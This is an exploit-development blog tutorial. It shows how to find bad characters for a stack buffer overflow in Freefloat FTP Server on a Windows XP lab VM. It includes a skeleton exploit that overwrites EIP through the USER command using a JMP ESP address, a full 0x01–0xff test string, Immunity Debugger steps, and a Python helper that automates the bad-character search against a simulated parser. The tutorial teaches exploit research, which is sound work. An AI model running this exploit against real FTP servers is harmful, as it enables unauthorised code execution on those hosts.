This blog post builds further on the basic concepts needed for exploit research and development. We will walk through the bad-character analysis process using Freefloat FTP Server – Download Link

This tutorial builds on our previous post “0x0 Exploit Tutorial: Buffer Overflow – Vanilla EIP Overwrite”, so if you have not already worked through that post, please do so first. Here we step back to an earlier point in the Freefloat exploit process to show how to determine the “bad characters” for a particular program: byte values that the target alters, drops or treats as a delimiter, and that would therefore corrupt our exploit or shellcode if they appeared in it. To follow along, you should have the following setup prepared:

1. VM platform (Virtualbox, Vmware, etc.)

2. A 32-bit Windows XP VM and a Kali Linux or BackTrack 5 R3 VM

3. Immunity Debugger, mona.py and Freefloat FTP Server installed on the Windows VM

Getting Started:

As previously mentioned, you should have already completed the tutorial (linked above) for the Freefloat FTP server, and should have a baseline exploit to work with. We will be using the (almost) completed skeleton script for our bad character analysis, which has been posted below:

import sys, socket

target = sys.argv[1]

# EIP control after 230 bytes in buffer
# '0x7cb68d7d' - JMP ESP | XP SP3 EN [SHELL32.dll] (C:\WINDOWS\system32\SHELL32.dll)
# 230 bytes of NOP padding, the JMP ESP address written little-endian, then 366 'C'
# (0x43) filler bytes that ESP points at after the jump; the bad-character
# string replaces those 'C's in the next step.
buff = b'\x90'*230 + b'\x7d\x8d\xb6\x7c' + b'\x43'*366

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, 21))
print(s.recv(2048))                      # FTP banner
s.send(b"USER " + buff + b"\r\n")        # FTP commands are CRLF-terminated
s.close()

At this point, start Freefloat FTP Server and attach Immunity Debugger to the running process (File > Attach, CTRL+F1):

SCREENSHOT 1

We will want to set a breakpoint (F2) on the JMP ESP instruction our script jumps to (0x7cb68d7d in the script above; if the JMP ESP you located in SHELL32.dll in the previous tutorial lives at a different address, break on that address and make sure the bytes in the script match it):

SCREENSHOT 2

Run the program (F9) and launch our exploit. As we can see, execution stops at our breakpoint on the JMP ESP instruction. Step into it with F7 and you will see that we land in our ‘\x43’ C’s, the user-controlled memory that we previously used to hold our shellcode.

SCREENSHOT 4

At this point we have validated that our skeleton exploit is functioning as expected. Our next step is to replace our ‘\x43’ C’s with a string containing every byte value from 0x01 to 0xff, in order, to use in our bad-character testing. The string is posted below:

b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

SCREENSHOT 5

As you may notice, ‘\x00’ is not listed. 0x00 is the null byte, which terminates a C string: the server’s string-handling routines would stop copying at the null and everything after it would never reach the stack, so it is excluded from the outset. Treat it as a bad character for practically any input that is handled as a string.

At this point, we rerun our exploit, again hitting our breakpoint and stepping into our ‘badchars’ with F7. Now right-click the address in the CPU pane of Immunity and select ‘Follow in Dump’ so the hex dump pane shows the memory ESP points at.

We can start by locating the ‘01’ in the hex dump. As we can see, it was rendered properly. If we continue along we see ‘02’, ‘03’, ‘04’ and so on, appearing in order until the point where we should see ‘0A’. Our pattern has ceased at ‘0A’, so 0x0a is a bad character. That is no surprise for an FTP server: 0x0a is the line feed, and a line-oriented command parser treats it as the end of the command. Only ever remove one bad character per run, since a single bad byte can truncate or shift everything that follows it and make good bytes look bad. We remove it, resend our buffer and follow the same procedure to view the hex dump of our buffer:

SCREENSHOT 7

This time, we see that ‘0D’ (the carriage return, the other half of the CRLF command terminator) has not rendered properly, indicating another bad character. We repeat this process, removing each bad character in succession, until every byte in the string appears intact and in order in the hex dump.

If you follow the process as detailed, you should arrive at the bad-character list “\x00\x0a\x0d”, with your hex dump appearing as follows. Note that this list is specific to this program and this input path (the argument of the USER command); a different command, a different program or a different protocol can mangle different bytes, so the analysis must be repeated for every new target or injection point:

SCREENSHOT 8
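The following Python 3 script is an added example and is not part of the original post or of the Freefloat exploit itself. It automates the two steps described above: building the candidate string from the list on this page minus the bytes already known to be bad, and comparing what was sent with what shows up in the dump pane to find the first byte that did not survive. The target is replaced by `simulated_server`, a constructed stand-in that behaves like a CRLF-terminated command parser (it keeps nothing from the first CR or LF onward); the dump text and its layout (an address, sixteen two-digit hex bytes, then an ASCII column) are constructed to resemble what Immunity’s ‘Follow in Dump’ pane shows and are not a real capture. All function names are this example’s own.

```python
"""Bad-character analysis helpers (added example, not the original post's code).

Assumptions: the target is simulated by `simulated_server`; the dump format
mirrors Immunity's 'Follow in Dump' pane (address, 16 hex bytes, ASCII) and
the sample dump below is constructed, not captured from a real run.
"""
import re

JMP_ESP = b'\x7d\x8d\xb6\x7c'   # 0x7cb68d7d, little-endian, from the skeleton script
PADDING = 230                    # bytes before EIP is overwritten


def badchar_string(exclude=(0x00,)):
    """All byte values 0x01..0xff in order, minus the ones already known bad."""
    return bytes(b for b in range(256) if b not in exclude)


def build_buffer(badchars):
    """Skeleton buffer with the candidate string in place of the 'C' filler."""
    return b'\x90' * PADDING + JMP_ESP + badchar_string(badchars)


def escaped(data):
    """Render bytes in the \\xNN literal form used in the exploit script."""
    return ''.join('\\x%02x' % b for b in data)


def parse_immunity_dump(text):
    """Turn pasted 'Follow in Dump' lines back into the bytes they display.

    Only the first 16 two-digit hex tokens after the 8-digit address are taken,
    so the ASCII column of a full line can never be mistaken for data. Parsing
    of a line stops at the first token that is not a hex byte.
    """
    out = bytearray()
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) < 2 or not re.fullmatch(r'[0-9A-Fa-f]{8}', parts[0]):
            continue
        for tok in parts[1:17]:
            if not re.fullmatch(r'[0-9A-Fa-f]{2}', tok):
                break
            out.append(int(tok, 16))
    return bytes(out)


def first_divergence(sent, observed):
    """Return (offset, sent_byte) of the first byte that did not survive, or None.

    Covers both failure modes: the buffer being cut short (observed is shorter)
    and a byte being rewritten in place (same length, different value).
    """
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return i, b
    return None


def simulated_server(payload):
    """Constructed stand-in for the FTP command parser: everything from the
    first CR or LF onward is treated as the end of the command and dropped."""
    for term in (b'\r', b'\n'):
        if term in payload:
            payload = payload[:payload.index(term)]
    return payload


def find_badchars(send, known=(0x00,)):
    """The manual loop from the post: send the candidate string, drop the first
    byte that fails to survive, resend, until every remaining byte is intact.
    `send` takes the candidate bytes and returns what the target kept (in the
    real workflow: what you read back out of the dump pane)."""
    bad = list(known)
    while True:
        candidate = badchar_string(bad)
        hit = first_divergence(candidate, send(candidate))
        if hit is None:
            return bytes(bad)
        bad.append(hit[1])


# Constructed dump text: what the pane might show after the first send, with the
# pattern stopping at 0x0a (the bytes after the cut are placeholder zeros).
DUMP_AFTER_FIRST_SEND = """
0022FB50  01 02 03 04 05 06 07 08  09 00 00 00 00 00 00 00  ................
0022FB60  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
"""

if __name__ == '__main__':
    hit = first_divergence(badchar_string(), parse_immunity_dump(DUMP_AFTER_FIRST_SEND))
    print('first byte missing from dump: offset %d, value 0x%02x' % hit)
    found = find_badchars(simulated_server)
    print('bad characters:', escaped(found))
    print('next test buffer is %d bytes' % len(build_buffer(found)))
```

In practice you would replace `simulated_server` with your own send-and-read-back step: send `build_buffer(bad)` with the USER command, paste the dump pane contents into `parse_immunity_dump`, and feed the result to `first_divergence`; `escaped` prints the final list in the form you need for msfvenom’s `-b` option or for the exploit script.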

Now that we have successfully identified our bad characters, you can proceed with your shellcode generation process as usual (referenced in exploit tutorial 0x0 – vanilla EIP overwrite).

If you are looking for additional exploit tutorials check out Offensive Security training, Fuzzy security blog, and Corelan.